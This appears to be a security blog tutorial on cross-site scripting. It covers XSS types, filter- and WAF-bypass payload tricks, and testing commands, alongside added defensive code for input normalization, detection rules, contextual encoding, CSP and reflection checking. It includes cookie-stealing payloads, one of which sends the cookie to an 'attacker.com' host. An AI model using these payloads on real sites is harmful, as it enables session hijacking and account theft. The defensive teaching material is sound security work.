Cross-Site Scripting (XSS): Techniques, Bypasses & Detection

Cross-Site Scripting (XSS) is a critical web vulnerability in which an attacker gets malicious JavaScript to run in a victim's browser under a trusted site's origin. Because the script runs with that origin's privileges, it can hijack sessions, read page data, perform actions as the user, and compromise accounts.

Types of XSS

  1. Reflected XSS – The payload travels in the URL or request body and is echoed back unencoded in the response; it is usually delivered as a crafted link, which is why it pairs well with phishing.
  2. Stored XSS – The payload is persisted server-side (database, comment, profile field) and executes for every user who views the page that renders it.
  3. DOM-Based XSS – The server response is clean; client-side JavaScript takes attacker-controlled input (for example `location.hash`) and passes it to an unsafe DOM sink such as `innerHTML` or `eval`.

Advanced Bypass Techniques

Obfuscation & Filter Evasion

  • Bracket Notation – Defeat naive string matching on `document.cookie` with `document['cookie']` (or `window['alert'](1)`): the filter sees different bytes, the engine resolves the same property.
  • Base64 Encoding – Hide the payload from simple filters. Note that Base64 is not executable by itself; it only runs if something decodes it at runtime, e.g. `eval(atob(...))`:
    btoa("alert(1)"); // Encodes to "YWxlcnQoMSk=" 
    atob("YWxlcnQoMSk="); // Decodes back to "alert(1)" 
    
  • Octal, Hex & Unicode Escapes – Bypass WAFs with alternative spellings. Octal (`\141`) and hex (`\x61`) escapes are only valid inside a JavaScript string literal, so they need a sink such as `eval` to become code; identifiers themselves accept only `\u` escapes:
    eval("\141\154\145\162\164(1)"); // Octal for "alert(1)" inside a string 
    eval("\x61\x6c\x65\x72\x74(1)"); // Hex for "alert(1)" inside a string 
    \u0061\u006c\u0065\u0072\u0074(1); // Unicode escapes are legal in an identifier: this is alert(1) 
    

Bypassing Parentheses & WAFs

  • Backtick Syntax – Call a function without parentheses via a tagged template; `alert` receives the template strings array `["1"]` and displays "1":
    alert`1`; 
    
  • Event Handlers – Trigger via an HTML attribute, so no `<script>` tag is needed:
    <img src="x" onerror="alert(1)"> 
    
  • Throw Syntax – Assign the global error handler and throw in one statement. The comma operator evaluates `onerror=alert` first, then throws the last operand; the browser invokes the handler with the error message, so `alert` fires without ever being called directly:
    throw onerror=alert, "aaaa", "bbbb"; 
    
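The two sections above list the encodings and syntax tricks from the attacker's side. The following is an added example, not code from the original post: a decode-then-match normalizer of the kind a detection rule or log-analysis job would run over request parameters, so that octal, hex and Unicode escapes, HTML entities, URL encoding, inline `atob()` blobs and bracket notation all collapse to one canonical form before signature matching. The rule names and sample inputs are constructed for the example; the decoding order and the bounded number of decode rounds are design choices, not a standard.

```javascript
// Added example, not from the original post: normalize request input, then match.
// Attackers stack encodings, so decode a bounded number of rounds (never unbounded).
const MAX_ROUNDS = 3;

// Resolve JavaScript string escapes: \u{61}, \u0061, \x61 and octal \141.
function decodeJsEscapes(s) {
  return s
    .replace(/\\u\{([0-9a-fA-F]+)\}/g, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\([0-7]{1,3})/g, (_, o) => String.fromCharCode(parseInt(o, 8)));
}

// Resolve HTML entities: &lt; &#60; &#x3c; ...
const NAMED = { lt: '<', gt: '>', quot: '"', apos: "'", amp: '&' };
function decodeHtmlEntities(s) {
  return s.replace(/&(#x[0-9a-fA-F]+|#\d+|[a-z]+);/g, (m, e) => {
    if (e[0] === '#') {
      const n = e[1] === 'x' || e[1] === 'X' ? parseInt(e.slice(2), 16) : parseInt(e.slice(1), 10);
      return String.fromCodePoint(n);
    }
    return NAMED[e] ?? m; // unknown entity: leave it alone
  });
}

// URL decoding can throw on malformed %-sequences; treat that as "not encoded".
function tryUrlDecode(s) { try { return decodeURIComponent(s); } catch { return s; } }

// Inline Base64 fed to atob(): atob("YWxlcnQoMSk=") -> atob("alert(1)")
function decodeAtobArgs(s) {
  return s.replace(/atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)/g,
    (m, b) => `atob("${Buffer.from(b, 'base64').toString('utf8')}")`);
}

// document['cookie'] / window["alert"] -> document.cookie / window.alert
function collapseBracketAccess(s) {
  return s.replace(/\[\s*["']([A-Za-z_$][\w$]*)["']\s*\]/g, '.$1');
}

function normalize(input) {
  let cur = input;
  for (let i = 0; i < MAX_ROUNDS; i++) {
    const next = collapseBracketAccess(
      decodeAtobArgs(decodeJsEscapes(decodeHtmlEntities(tryUrlDecode(cur)))));
    if (next === cur) break; // fixed point reached
    cur = next;
  }
  return cur.toLowerCase();
}

// Signatures run against the normalized text, so one rule covers alert(1),
// alert`1`, \x61\x6c..., document['cookie'], <svg/onload=...> and so on.
// Rule names are made up for this example.
const RULES = [
  { name: 'script-tag',    re: /<\s*script\b/ },
  { name: 'event-handler', re: /\bon[a-z]+\s*=/ },
  { name: 'js-sink-call',  re: /\b(alert|eval|fetch|prompt|confirm)\s*(\(|`)/ },
  { name: 'cookie-access', re: /document\.cookie/ },
  { name: 'throw-onerror', re: /throw\s+onerror\s*=/ },
];

// Returns the names of every rule that fires for this input (empty = clean).
function classify(input) {
  const n = normalize(input);
  return RULES.filter(r => r.re.test(n)).map(r => r.name);
}

// Constructed sample inputs, one per technique from the sections above.
const SAMPLES = [
  '\\141\\154\\145\\162\\164(1)',                       // octal
  '\\x61\\x6c\\x65\\x72\\x74(1)',                       // hex
  "document['cookie']",                                // bracket notation
  'atob("YWxlcnQoMSk=")',                              // base64
  'alert`1`',                                          // tagged template
  '%3Cscript%3Ealert(document.cookie)%3C/script%3E',   // URL-encoded
  '<svg/onload=alert(1)>',                             // event handler
  'throw onerror=alert,1',                             // throw syntax
  'plain search term',                                 // benign
];
for (const s of SAMPLES) console.log(JSON.stringify(s), '->', classify(s));
```

The point of the block is the pipeline shape (decode a bounded number of rounds, then match once), not the specific regexes: a rule that only matches the literal string `alert(` is defeated by every trick on this page, while the same rule applied after normalization catches all of them. A real deployment would also log the decoded form next to the raw one so an analyst can see what the filter saw.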

Detection & Prevention Strategies

  • Contextual Encoding – Escape output for the exact context it lands in (HTML body, HTML attribute, JavaScript string, CSS, URL). One generic encoder applied everywhere is a classic source of bypasses, because what is safe in one context is not in another.
  • Content Security Policy (CSP) – Restrict script execution to trusted sources with per-response nonces (or hashes), `'strict-dynamic'`, and `object-src 'none'`; a policy that still permits `'unsafe-inline'` for scripts stops none of the payloads above.
  • Secure Cookies – `HttpOnly` keeps the session cookie out of `document.cookie`, so the cookie-theft payloads above return nothing; `SameSite` limits cross-site request forgery but does not stop XSS, since injected script already runs same-site.
  • WAF Limitations – Treat a WAF as a secondary control only: the encoding, alternative syntax, and obfuscation tricks above are exactly what attackers combine to slip past signature rules, so the fix has to live in the application.
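Contextual encoding, as an added example (not code from the original post): three encoders, one per output context, beside the kind of unencoded template that produces reflected XSS, plus the CSP header the list above describes. The page template, the `safeHref` allow-list, and the test inputs are assumptions constructed for the example; they are not from any particular framework.

```javascript
// Added example, not from the original post: encode for the context, not "for XSS".

// HTML body and quoted attribute context: neutralize the five structural characters.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// JavaScript string context: \xHH-escape everything that is not alphanumeric, so
// a value can neither close its quotes nor emit a literal </script> tag.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, c => {
    const cp = c.charCodeAt(0);
    return cp < 256 ? '\\x' + cp.toString(16).padStart(2, '0')
                    : '\\u' + cp.toString(16).padStart(4, '0');
  });
}

// URL parameter context: percent-encode the value.
function encodeUrlParam(s) { return encodeURIComponent(String(s)); }

// A whole URL placed in href/src needs scheme validation, not encoding:
// percent-encoding does nothing against javascript: or data: URLs.
// (Assumed policy for this example: only http/https links are allowed.)
function safeHref(url) {
  const u = String(url).trim();
  return /^https?:\/\//i.test(u) ? u : '#';
}

// Vulnerable: the search term is dropped straight into the template (reflected XSS).
function renderSearchVulnerable(q) {
  return `<p>Results for: ${q}</p>`;
}

// Hardened: same data, three contexts, three encoders.
function renderSearchSafe(q) {
  return `<p>Results for: ${encodeHtml(q)}</p>`
    + `<script nonce="NONCE">var lastQuery = "${encodeJsString(q)}";</script>`
    + `<a href="/search?q=${encodeUrlParam(q)}">permalink</a>`;
}

// CSP that only runs scripts carrying this response's nonce. The nonce must be
// unpredictable and generated fresh per response (e.g. 128 random bits, Base64);
// generation is left to the server framework here.
function cspHeader(nonce) {
  return `script-src 'nonce-${nonce}' 'strict-dynamic'; object-src 'none'; base-uri 'none'`;
}

// Constructed inputs: the page's own payloads fed through both templates.
const probes = ['<img src=x onerror=alert(1)>', '"; alert(1); //', '</script><svg/onload=alert(1)>'];
for (const p of probes) {
  console.log('VULN :', renderSearchVulnerable(p));
  console.log('SAFE :', renderSearchSafe(p));
}
console.log(cspHeader('r4nd0mNonceFromServer'));
```

`encodeJsString` deliberately over-encodes: escaping `/` and `<` as well as the quote characters is what prevents the `</script>` breakout, which a quotes-only escaper misses. The `NONCE` placeholder in `renderSearchSafe` stands for the per-response value that also goes into `cspHeader`; reusing a static nonce defeats the policy.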

You Should Know:

Practical XSS Testing Commands

1. Test for Reflected XSS (Linux) – match the exact payload; grepping for "script" alone also matches the page's own script tags and an entity-encoded (harmless) reflection:

curl -s "http://example.com/search?q=<script>alert(1)</script>" | grep -F "<script>alert(1)</script>" 

2. Check DOM XSS (Browser Console):

console.log(document.location.hash); // See what the page receives, then search its scripts for sinks (innerHTML, eval, document.write) fed from location.hash 

3. Automated Scanning with ZAP:

zap-cli quick-scan -s xss http://example.com 

4. Windows Command for Payload Testing (PowerShell; inspect the body and look for the unencoded payload):

(Invoke-WebRequest "http://example.com/?q=<svg/onload=alert(1)>").Content | Select-String -SimpleMatch "<svg/onload=alert(1)>" 
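The manual commands above answer "is my string in the response?", which is not the same as "is it reflected unencoded, and in what context?". The following is an added example, not code from the original post: a probe-and-classify check of the kind a scanner performs. It sends a unique token followed by the characters that matter (`<>"'`), then for each reflection reports whether those characters came back raw, entity-encoded, or otherwise transformed, and whether the reflection sits in HTML text, inside a tag, or inside a `<script>` block. The two HTTP responses are constructed inline so the example runs offline; the token and the example.com URL are assumptions.

```javascript
// Added example, not from the original post: classify reflections instead of grepping.
const TOKEN = 'zq9x';            // unique, unlikely to occur naturally in the page
const SPECIALS = '<>"\'';        // the characters that decide whether a context can be broken
const PROBE = TOKEN + SPECIALS;

// The probe as it would be sent: only the token needs to be URL-safe.
function probeUrl(base) { return base + encodeURIComponent(PROBE); }

// Minimal entity map: enough to recognise the common encoded forms of SPECIALS.
const ENC = { '&lt;': '<', '&gt;': '>', '&quot;': '"', '&#x27;': "'", '&#39;': "'", '&apos;': "'" };
function undoEntities(s) { return s.replace(/&(lt|gt|quot|apos|#x27|#39);/g, m => ENC[m]); }

// Where in the markup does offset idx sit? 'script' > 'tag' > 'html'.
function contextAt(body, idx) {
  const before = body.slice(0, idx).toLowerCase();
  if (before.lastIndexOf('<script') > before.lastIndexOf('</script')) return 'script';
  return before.lastIndexOf('<') > before.lastIndexOf('>') ? 'tag' : 'html';
}

// Every occurrence of the token, with how SPECIALS survived right after it.
function findReflections(body) {
  const hits = [];
  let idx = body.indexOf(TOKEN);
  while (idx !== -1) {
    const tail = body.slice(idx + TOKEN.length, idx + TOKEN.length + 40); // room for entity forms
    let encoding;
    if (tail.startsWith(SPECIALS)) encoding = 'unencoded';
    else if (undoEntities(tail).startsWith(SPECIALS)) encoding = 'html-encoded';
    else encoding = 'transformed'; // stripped, URL-encoded, backslash-escaped, ...
    hits.push({ offset: idx, encoding, context: contextAt(body, idx) });
    idx = body.indexOf(TOKEN, idx + 1);
  }
  return hits;
}

// Any unencoded reflection of the full probe is exploitable in its context.
function isVulnerable(body) {
  return findReflections(body).some(h => h.encoding === 'unencoded');
}

// Constructed responses. SAFE_RESPONSE would match `grep -i script` (it has a
// script tag) even though the reflection is entity-encoded and harmless.
const SAFE_RESPONSE =
  '<html><head><script src="/app.js"></script></head>'
  + '<body><p>Results for: zq9x&lt;&gt;&quot;&#x27;</p></body></html>';
// VULN_RESPONSE reflects the probe raw twice: inside an attribute and inside a script.
const VULN_RESPONSE =
  '<html><body><input value="zq9x<>"\'">'
  + '<script>var q="zq9x<>"\'";</script></body></html>';

console.log(probeUrl('http://example.com/search?q='));
console.log('safe :', isVulnerable(SAFE_RESPONSE), findReflections(SAFE_RESPONSE));
console.log('vuln :', isVulnerable(VULN_RESPONSE), findReflections(VULN_RESPONSE));
```

The context label matters for the next step: a raw reflection inside a tag needs an attribute breakout (`" onerror=...`), one inside a script block needs a string breakout or `</script>`, and one in HTML text takes the plain `<svg/onload=...>` form. A `transformed` result is not automatically safe (backslash escaping of quotes, for instance, still leaves `</script>` usable in script context) and deserves a manual look.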

What Undercode Say

XSS remains a top web threat because applications still mix untrusted input into HTML and JavaScript without context-aware encoding, and WAF signatures cannot keep up with the encoding, event-handler, and JavaScript-syntax tricks shown above. Prevention has to be layered: output encoding per context, a nonce-based CSP, and `HttpOnly` session cookies, with a WAF as a backstop rather than the primary control.

Expected Output:

  • Reflected XSS Exploit:
    http://example.com/search?q=<script>alert(document.cookie)</script> 
    
  • Stored XSS Payload:
    <script>fetch('https://attacker.com/steal?data='+btoa(document.cookie))</script> 
    
  • DOM XSS via Hash – this is the vulnerable sink pattern, not a payload: whatever follows `#` in the URL is executed, so `https://example.com/page#alert(document.cookie)` pops the cookie:
    eval(decodeURIComponent(location.hash.slice(1))); 
    

Prediction

XSS attacks will evolve with AI-driven payload generation, making traditional WAFs less effective. Future defenses may rely on runtime behavior analysis and stricter CSP policies.

Reported By: Zlatanh Crosssite – Hackers Feeds